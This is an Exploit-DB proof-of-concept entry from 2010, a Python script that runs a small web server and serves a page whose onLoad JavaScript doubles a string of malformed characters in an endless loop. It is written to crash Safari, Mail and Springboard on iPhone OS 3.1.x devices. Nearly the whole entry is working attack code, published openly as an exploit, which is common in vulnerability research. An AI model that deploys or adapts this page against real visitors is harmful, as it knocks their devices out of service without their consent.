iPhone Springboard – Malformed Character Crash (PoC)

  • Author: Chase Higgins
    Date: 2010-03-15
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11769/

    #!/usr/bin/python
    
    #iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3
    #this script acts as a web server, and causes Safari, as well as Mail and Springboard, to crash
    #all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my 
    #device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it
    
    # Exploit Title: iPhone Springboard Malformed Character Crash PoC
    # Date: 3/15/2010
    # Author: Chase Higgins
    # Software Link: apple.com/iphone/
    # Version: iPhone 2G, iPhone 3GS
    # Tested on: iPhone OS 3.1, and iPhone OS 3.1.3
    # CVE : 
    # Code : none
    
    import sys, socket;
    
    def main():
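    	# Page served to every client that connects. In the JavaScript below, i is
    	# never incremented, so the while loop's exit condition is never met and
    	# evil_string doubles in length on every pass.
    	html = """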
    	<html>
    	<head>
    	<script>
    	function triggerCrash(){
    		evil_div = document.getElementById('evilDiv');
    		var evil_string = "\x4e\x5b\x01";
    		i = 0;
    
    		while (i < 1000){
    			evil_string = evil_string + evil_string;
    		}
    
    		evil_div.innerHTML = evil_string;
    	}
    	</script>
    	</head>
    	<body onLoad="triggerCrash()">
    	<div id="evilDiv">
    	 
    	</div>
    	</body>
    	</html>
    	""";
    
    	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
    	s.bind(('',2121));
    	s.listen(1);
    	
    	while True:
    		channel, details = s.accept();
    		print channel.recv(1024);
    		channel.send(html);
    		channel.close();
    	
    main();